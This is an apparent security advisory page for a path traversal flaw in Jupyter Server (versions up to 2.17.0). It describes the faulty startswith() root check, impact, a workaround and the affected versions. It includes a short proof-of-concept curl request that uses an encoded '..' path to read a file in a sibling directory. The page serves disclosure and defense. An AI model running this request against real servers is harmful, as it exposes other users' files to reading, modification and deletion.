GHSA-5789-5fc7-67v3

Suggest an improvement
Source
https://github.com/advisories/GHSA-5789-5fc7-67v3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5789-5fc7-67v3/GHSA-5789-5fc7-67v3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5789-5fc7-67v3
Aliases
Related
Published
2026-05-05T16:49:10Z
Modified
2026-05-20T08:11:15.547566183Z
Severity
  • 7.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L CVSS Calculator
  • 7.6 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N CVSS Calculator
Summary
Jupyter Server: Path Traversal via incorrect startswith() root directory check allows access to sibling directories
Details

Summary

Jupyter Server <=2.17.0 can access directories sibling to the root directory, if it starts with the root dir's name.

PoC

Minimal:

.
├── test/              <- root directory.
│   └── test.txt
└── testtest/
    └── secret.txt     <- file to exfiltrate that we should not be able to access via API

HOST="http://localhost:8888"
TOKEN=""
SIBLING="testtest"
TARGET="secret.txt"

curl -s -X POST \
  "$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints" \
  -H "Authorization: token $TOKEN"

Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006

Impact

It is possible for an authenticated user to access content outside the server's root_dir in siblings directories sharing the same prefix as the root_dir. The attacker can escalate access, reading, writing, and deleting from sibling directories.

This can have a tangible impact for deployments using predictable naming scheme with multi-tenant server, for example user1, user2, user3, ..., user10 etc, as user1 could access and modify files of all user10 - user19 and higher.

In a hypothetical system where users can choose a name of their folder, an attacker could choose a single-letter username to gain access to a significant number of sibling directories.

Workarounds

Use folder names that do not overlap.

Acknowledgments

Thank you to @stef41 for providing a useful PoC.

Database specific 
{
    "github_reviewed_at": "2026-05-05T16:49:10Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-22"
    ],
    "nvd_published_at": "2026-05-05T20:16:38Z",
    "severity": "HIGH"
}
References

Affected packages

PyPI / jupyter-server

Package

Name
jupyter-server
View open source insights on deps.dev
Purl
pkg:pypi/jupyter-server

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.18.0

Affected versions

0.*
0.0.0
0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.1.0
0.1.1
0.2.0
0.2.1
0.3.0
1.*
1.0.0rc0
1.0.0rc1
1.0.0rc2
1.0.0rc3
1.0.0rc4
1.0.0rc5
1.0.0rc6
1.0.0rc7
1.0.0rc8
1.0.0rc9
1.0.0rc10
1.0.0rc11
1.0.0rc12
1.0.0rc13
1.0.0rc14
1.0.0rc15
1.0.0rc16
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.0.11
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0
1.2.1
1.2.2
1.2.3
1.3.0
1.4.0
1.4.1
1.5.0
1.5.1
1.6.0
1.6.1
1.6.2
1.6.3
1.6.4
1.7.0a1
1.7.0a2
1.7.0
1.8.0
1.9.0
1.10.0
1.10.1
1.10.2
1.11.0
1.11.1
1.11.2
1.12.0
1.12.1
1.13.0
1.13.1
1.13.2
1.13.3
1.13.4
1.13.5
1.15.0
1.15.1
1.15.2
1.15.3
1.15.4
1.15.5
1.15.6
1.16.0
1.17.0
1.17.1
1.18.0
1.18.1
1.19.0
1.19.1
1.21.0
1.23.0
1.23.1
1.23.2
1.23.3
1.23.4
1.23.5
1.23.6
1.24.0
2.*
2.0.0a0
2.0.0a1
2.0.0a2
2.0.0b0
2.0.0b1
2.0.0rc0
2.0.0rc1
2.0.0rc2
2.0.0rc3
2.0.0rc4
2.0.0rc5
2.0.0rc6
2.0.0rc7
2.0.0rc8
2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6
2.0.7
2.1.0
2.2.0
2.2.1
2.3.0
2.4.0
2.5.0
2.6.0
2.7.0
2.7.1
2.7.2
2.7.3
2.8.0
2.9.0
2.9.1
2.10.0
2.10.1
2.11.0
2.11.1
2.11.2
2.12.0
2.12.1
2.12.2
2.12.3
2.12.4
2.12.5
2.13.0
2.14.0
2.14.1
2.14.2
2.15.0
2.16.0
2.17.0

Database specific

last_known_affected_version_range 
"<= 2.17.0"
source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5789-5fc7-67v3/GHSA-5789-5fc7-67v3.json"